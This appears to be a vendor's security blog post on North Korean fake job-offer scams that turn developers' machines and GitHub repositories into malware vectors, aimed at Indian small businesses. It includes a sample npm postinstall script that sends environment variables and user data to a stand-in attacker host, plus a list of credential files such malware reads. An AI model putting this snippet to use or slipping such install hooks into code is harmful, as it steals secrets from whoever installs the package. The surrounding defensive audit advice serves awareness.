North Korean Job Scams Turn Developers Into Malware Vectors

What Happened

In a sophisticated social engineering campaign, North Korean threat actors have been running elaborate fake job recruitment scams targeting software developers. The twist? Once a developer is compromised, their GitHub repositories and development environments become the infection vector for spreading remote access Trojans (RATs) and other malware to downstream users and organizations.

The attack chain is particularly insidious because it leverages the trust developers place in open-source code and peer-reviewed repositories. A developer receives what appears to be a legitimate job offer from a well-known tech company—complete with professional communication, realistic interview processes, and even fake technical assessments. During the "interview," the attacker convinces the developer to download "assessment tools" or "coding environment setups" that are actually malware payloads.

Once installed on the developer's machine, the malware establishes persistence and begins harvesting credentials, SSH keys, GitHub tokens, and API credentials stored in the developer's environment. But here's where it becomes a "contagious interview": the attacker then uses these credentials to push malicious code into the developer's public or private repositories. Any organization that pulls these repositories—or any developer who forks the code—becomes infected. The malware self-propagates through dependency chains, affecting entire development teams and, potentially, millions of end users if the compromised code makes it into production.

Why This Matters for Indian Businesses

If you're an Indian SMB using open-source libraries, pulling code from GitHub, or hiring remote developers—you're in the blast radius of this attack.

Here's the direct impact:

1. Compliance Risk: Under the Digital Personal Data Protection (DPDP) Act, if a breach occurs through compromised code in your supply chain, you are liable for notifying affected users within 72 hours. The fact that the malware came from a third-party repository doesn't exempt you from compliance.

1. CERT-In Notification Mandate: If your organization is classified as a "critical information infrastructure" (which includes fintech, healthcare, e-commerce), you must notify CERT-In within 6 hours of detecting a breach. A supply chain compromise from malicious code is treated as a breach.

1. RBI Guidelines: For financial services companies, the RBI's Cyber Security Framework requires you to maintain integrity of your software supply chain. Using compromised dependencies violates this explicitly.

1. Developer Trust Erosion: In my years building enterprise systems, I've seen how a single compromised developer can cascade failures across an entire organization. Indian SMBs often have smaller, tightly-knit development teams—when one person is compromised, the blast radius is proportionally larger.

1. Fake Job Scams Target India Specifically: North Korean threat actors have increasingly targeted Indian developers and BPOs because of the large English-speaking tech workforce and the relative ease of spoofing Indian recruitment agencies. I've reviewed dozens of Indian SMB security postures, and almost none have developer endpoint security or code repository monitoring in place.

Technical Breakdown

Let's walk through how this attack actually works:

graph TD
    A["Attacker: Fake Job Offer"] -->|Email + LinkedIn| B["Developer: Receives Offer"]
    B -->|"Accepts, Interviews"|C["Fake Assessment Tool Download"]
    C -->|"Contains RAT Payload"|D["Developer Machine: Compromised"]
    D -->|"Harvests: SSH keys, GitHub tokens, API creds"|E["Attacker Access: Dev Environment"]
    E -->|"Pushes malicious commits"|F["GitHub Repo: Infected"]
    F -->|"Other devs pull code"|G["Downstream: Infection Spreads"]
    G -->|"Dependency chains propagate"|H["Production Code: Compromised"]
    H -->|"End users affected"|I["Breach: DPDP/CERT-In Notification Required"]

The Attack Flow in Detail

Stage 1: Social Engineering The attacker creates a convincing fake job posting on LinkedIn or directly emails the developer. The job title and company details are researched—often spoofing real companies like TCS, Infosys, or HCL. The communication is professional, the salary is attractive, and the interview process feels legitimate.

Stage 2: Malware Delivery During the "technical assessment," the attacker asks the developer to:

1. Download a "coding environment setup script"
2. Install a "company-standard development tool"
3. Run a "performance benchmarking utility"

Stage 3: Credential Harvesting Once installed, the malware scans the developer's machine for:

1. ~/.ssh/ — SSH private keys
2. ~/.git-credentials — Git credentials
3. ~/.docker/config.json — Docker registry tokens
4. ~/.aws/credentials — AWS access keys
5. GITHUB_TOKEN environment variables
6. Browser password managers and cookies

1. Clone the developer's repositories (public and private)
2. Inject malicious code into common files (e.g., package.json, requirements.txt, build.gradle)
3. Commit and push the changes
4. Delete logs or use the developer's own credentials to hide the activity

1. git clone the infected repository
2. npm install the poisoned package
3. pip install the compromised library

Real-World Code Example

Here's a simplified example of how malicious code might be hidden in a legitimate-looking npm package:

// Original package.json - looks normal
{
  "name": "image-processor",
  "version": "1.2.3",
  "scripts": {
    "install": "node scripts/setup.js",
    "postinstall": "node scripts/postinstall.js"
  }
}

// Malicious scripts/postinstall.js - hidden in plain sight
const https = require('https');
const os = require('os');

// Exfiltrate environment variables and SSH keys
const exfiltrate = () => {
  const data = {
    env: process.env,
    home: os.homedir(),
    user: os.userInfo()
  };
  
  const payload = JSON.stringify(data);
  const req = https.request('https://attacker-c2.com/collect', {
    method: 'POST',
    headers: { 'Content-Length': payload.length }
  });
  req.write(payload);
  req.end();
};

exfiltrate();

The malicious code runs silently during package installation—most developers never notice it.

How to Protect Your Business

Quick Fix: Scan Your Repositories Right Now

# Check for exposed secrets in your git history
git log -p | grep -i "password\|api_key\|secret\|token" | head -20

# For Node.js projects - audit dependencies
npm audit --production

# For Python projects - check for vulnerabilities
pip install safety && safety check

# Scan git history for secrets (install: pip install truffleHog)
trufflehog filesystem . --json

# Check for suspicious postinstall scripts
grep -r "postinstall\|preinstall" node_modules/*/package.json | head -10

Specific Actions for Indian SMBs

For Development Teams

1. Verify Job Offers: If someone on your team receives an unsolicited job offer, have them confirm directly with the company's main HR email (not a Gmail address).
2. Implement Code Signing: Use GPG signatures for git commits. This proves commits actually came from your team.
3. Monitor Repository Activity: Enable GitHub branch protection rules and require reviews for all commits.

For Leadership

1. Conduct a Code Audit: Identify all external dependencies your product uses. Check their maintenance status and maintainer credibility.
2. Establish a Vendor Risk Framework: Before adopting any open-source library, assess the maintainer's security practices.
3. Prepare for CERT-In Notification: If a breach occurs via supply chain, you have 6 hours. Have a notification template and process ready.

For Compliance Teams

1. Document Your Supply Chain: Under DPDP, you must document where your code and data come from. Create an inventory of all dependencies.
2. Implement Access Controls: Ensure only authorized developers can push to production repositories.
3. Audit Logs: Maintain 90 days of git commit logs and access logs for compliance review.

How Bachao.AI Detects This

This is exactly why I built Bachao.AI—to make this kind of protection accessible to Indian SMBs without the enterprise budget.

The Bottom Line

Supply chain attacks are no longer theoretical—they're happening right now, and the vector is often a single compromised developer. The sophistication of North Korean threat actors means they're not just targeting enterprises; they're targeting SMBs because our security postures are often weaker.

The good news? This attack is highly preventable with the right monitoring and practices in place. You don't need a Fortune 500 security budget to protect your code. You need visibility into your supply chain, credential management discipline, and the ability to detect anomalies quickly.

If you haven't audited your repositories or your developers' endpoints recently, now is the time.

Book Your Free VAPT Scan → — We'll scan your repositories, identify exposed secrets, and flag vulnerable dependencies. Takes 15 minutes, no credit card required.

Originally reported by Dark Reading

Written by Shouvik Mukherjee, Founder of Bachao.AI. Follow me on LinkedIn for daily cybersecurity insights for Indian businesses.

Written by Shouvik Mukherjee, Founder of Bachao.AI. Follow me on LinkedIn for daily cybersecurity insights for Indian businesses.